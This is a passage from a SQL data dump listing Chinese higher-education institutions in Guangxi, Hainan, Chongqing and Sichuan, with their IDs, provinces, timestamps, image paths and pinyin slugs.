17:40:38','/images/school/default.png','guangzhoutieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1805,'广西大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxidaxue',0,NULL,NULL,0,NULL,NULL),(1806,'广西科技大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxikejidaxue',0,NULL,NULL,0,NULL,NULL),(1807,'桂林电子科技大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilindianzikejidaxue',0,NULL,NULL,0,NULL,NULL),(1808,'桂林理工大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilinligongdaxue',0,NULL,NULL,0,NULL,NULL),(1809,'广西医科大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiyikedaxue',0,NULL,NULL,0,NULL,NULL),(1810,'广西中医药大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxizhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1811,'广西师范大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxishifandaxue',0,NULL,NULL,0,NULL,NULL),(1812,'广西民族大学','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangximinzudaxue',0,NULL,NULL,0,NULL,NULL),(1813,'右江民族医学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','youjiangminzuyixueyuan',0,NULL,NULL,0,NULL,NULL),(1814,'桂林医学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilinyixueyuan',0,NULL,NULL,0,NULL,NULL),(1815,'广西师范学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1816,'广西民族师范学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangximinzushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1817,'河池学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hechixueyuan',0,NULL,NULL,0,NULL,NULL),(1818,'玉林师范学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yulinshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1819,'广西艺术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1820,'百色学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','baisexueyuan',0,NULL,NULL,0,NULL,NULL),(1821,'广西财经学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxicaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(1822,'南宁学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','nanningxueyuan',0,NULL,NULL,0,NULL,NULL),(1823,'钦州学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qinzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1824,'桂林航天工业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilinhangtiangongyexueyuan',0,NULL,NULL,0,NULL,NULL),(1825,'贺州学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hezhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1826,'广西外国语学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1827,'梧州学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','wuzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1828,'广西体育高等专科学校','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxitiyugaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1829,'柳州师范高等专科学校','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liuzhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1830,'桂林旅游学院','广西省','2014-04-23 00:00:00','2017-09-04 17:33:45','/images/school/default.png','guilinlvyougaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1831,'广西幼儿师范高等专科学校','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1832,'桂林师范高等专科学校','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilinshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1833,'广西警官高等专科学校','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijingguangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1834,'广西机电职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1835,'南宁职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','nanningzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1836,'广西职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1837,'柳州职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1838,'柳州铁道职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liuzhoutiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1839,'广西现代职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxixiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1840,'柳州城市职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','liuzhouchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1841,'百色职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','baisezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1842,'广西工程职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1843,'广西理工职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiligongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1844,'梧州职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','wuzhouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1845,'广西经济职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijingjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1846,'广西科技职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1847,'广西卫生职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1848,'广西培贤国际职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxipeixianguojizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1849,'广西水利电力职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxishuilidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1850,'广西生态工程职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxishengtaigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1851,'广西交通职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1852,'广西工业职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1853,'广西国际商务职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiguojishangwuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1854,'广西农业职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxinongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1855,'广西建设职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1856,'贵港职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guigangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1857,'北海职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','beihaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1858,'北海艺术设计学院','广西壮族自治区','2014-04-23 00:00:00','2017-09-04 17:34:24','/images/school/default.png','beihaiyishushejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1859,'桂林山水职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guilinshanshuizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1860,'广西经贸职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxijingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1861,'广西工商职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxigongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1862,'广西演艺职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiyanyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1863,'广西电力职业技术学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1864,'广西城市职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxichengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1865,'广西英华国际职业学院','广西壮族自治区','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','guangxiyinghuaguojizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1866,'海南大学','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainandaxue',0,NULL,NULL,0,NULL,NULL),(1867,'海南师范大学','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanshifandaxue',0,NULL,NULL,0,NULL,NULL),(1868,'琼州学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','qiongzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1869,'海南医学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanyixueyuan',0,NULL,NULL,0,NULL,NULL),(1870,'海口经济学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','haikoujingjixueyuan',0,NULL,NULL,0,NULL,NULL),(1871,'三亚学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sanyaxueyuan',0,NULL,NULL,0,NULL,NULL),(1872,'琼台师范学院','海南省','2014-04-23 00:00:00','2017-09-04 17:35:07','/images/school/default.png','qiongtaishifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1873,'海南工商职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainangongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1874,'海南科技职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainankejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1875,'三亚理工职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sanyaligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1876,'海南职业技术学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1877,'三亚城市职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sanyachengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1878,'海南软件职业技术学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1879,'海南政法职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanzhengfazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1880,'海南外国语职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanwaiguoyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1881,'海南经贸职业技术学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','hainanjingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1882,'三亚航空旅游职业学院','海南省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sanyahangkonglvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1883,'重庆大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdaxue',0,NULL,NULL,0,NULL,NULL),(1884,'西南大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinandaxue',0,NULL,NULL,0,NULL,NULL),(1885,'重庆邮电大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingyoudiandaxue',0,NULL,NULL,0,NULL,NULL),(1886,'重庆交通大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(1887,'重庆医科大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingyikedaxue',0,NULL,NULL,0,NULL,NULL),(1888,'重庆师范大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingshifandaxue',0,NULL,NULL,0,NULL,NULL),(1889,'西南政法大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinanzhengfadaxue',0,NULL,NULL,0,NULL,NULL),(1890,'重庆理工大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingligongdaxue',0,NULL,NULL,0,NULL,NULL),(1891,'重庆工商大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggongshangdaxue',0,NULL,NULL,0,NULL,NULL),(1892,'重庆文理学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(1893,'重庆三峡学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingsanxiaxueyuan',0,NULL,NULL,0,NULL,NULL),(1894,'长江师范学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','changjiangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1895,'四川外国语大学','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(1896,'四川美术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanmeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1897,'重庆科技学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingkejixueyuan',0,NULL,NULL,0,NULL,NULL),(1898,'重庆警察学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1899,'重庆人文科技学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingrenwenkejixueyuan',0,NULL,NULL,0,NULL,NULL),(1900,'重庆第二师范学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdiershifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1901,'重庆电力高等专科学校','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdianligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1902,'重庆幼儿师范高等专科学校','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1903,'重庆三峡医药高等专科学校','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingsanxiayiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1904,'重庆医药高等专科学校','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1905,'重庆航天职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinghangtianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1906,'重庆传媒职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingchuanmeizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1907,'重庆房地产职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingfangdichanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1908,'重庆青年职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingqingnianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1909,'重庆财经职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingcaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1910,'重庆科创职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingkechuangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1911,'重庆建筑工程职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjianzhugongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1912,'重庆电讯职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdianxunzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1913,'重庆能源职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingnengyuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1914,'重庆商务职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1915,'重庆交通职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1916,'重庆化工职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinghuagongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1917,'重庆旅游职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinglvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1918,'重庆安全技术职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinganquanjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1919,'重庆公共运输职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggonggongyunshuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1920,'重庆艺术工程职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingyishugongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1921,'重庆轻工职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingqinggongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1922,'重庆电信职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdianxinzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1923,'重庆经贸职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1924,'重庆文化艺术职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingwenhuayishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1925,'重庆服装工程职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingfuzhuanggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1926,'重庆工业职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1927,'重庆三峡职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingsanxiazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1928,'重庆工贸职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggongmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1929,'重庆机电职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1930,'重庆正大软件职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingzhengdaruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1931,'重庆电子工程职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingdianzigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1932,'重庆海联职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinghailianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1933,'重庆信息技术职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingxinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1934,'重庆城市管理职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingchengshiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1935,'重庆工程职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1936,'重庆城市职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1937,'重庆水利电力职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingshuilidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1938,'重庆工商职业学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqinggongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1939,'重庆民生职业技术学院','重庆市','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongqingminshengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1940,'四川大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuandaxue',0,NULL,NULL,0,NULL,NULL),(1941,'西南交通大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinanjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(1942,'电子科技大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','dianzikejidaxue',0,NULL,NULL,0,NULL,NULL),(1943,'西南财经大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinancaijingdaxue',0,NULL,NULL,0,NULL,NULL),(1944,'西南民族大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinanminzudaxue',0,NULL,NULL,0,NULL,NULL),(1945,'成都理工大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduligongdaxue',0,NULL,NULL,0,NULL,NULL),(1946,'西南科技大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinankejidaxue',0,NULL,NULL,0,NULL,NULL),(1947,'西华大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xihuadaxue',0,NULL,NULL,0,NULL,NULL),(1948,'四川农业大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuannongyedaxue',0,NULL,NULL,0,NULL,NULL),(1949,'成都中医药大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1950,'四川师范大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanshifandaxue',0,NULL,NULL,0,NULL,NULL),(1951,'西华师范大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xihuashifandaxue',0,NULL,NULL,0,NULL,NULL),(1952,'中国民用航空飞行学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','zhongguominyonghangkongfeixingxueyuan',0,NULL,NULL,0,NULL,NULL),(1953,'西南石油大学','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xinanshiyoudaxue',0,NULL,NULL,0,NULL,NULL),(1954,'成都信息工程大学','四川省','2014-04-23 00:00:00','2017-09-04 17:36:52','/images/school/default.png','chengduxinxigongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1955,'四川理工学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1956,'西昌学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','xichangxueyuan',0,NULL,NULL,0,NULL,NULL),(1957,'泸州医学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','luzhouyixueyuan',0,NULL,NULL,0,NULL,NULL),(1958,'川北医学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chuanbeiyixueyuan',0,NULL,NULL,0,NULL,NULL),(1959,'绵阳师范学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','mianyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1960,'内江师范学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','neijiangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1961,'宜宾学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','yibinxueyuan',0,NULL,NULL,0,NULL,NULL),(1962,'四川文理学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(1963,'乐山师范学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','leshanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1964,'成都体育学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengdutiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1965,'四川音乐学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','sichuanyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(1966,'成都学院','四川省','2014-04-23 00:00:00','2015-10-16 17:40:38','/images/school/default.png','chengduxueyuan',0,NULL,NULL,0,NULL,NULL),(1967,'成都工业学院','四川省','2014-04-23 00:00:00','2015-10-16 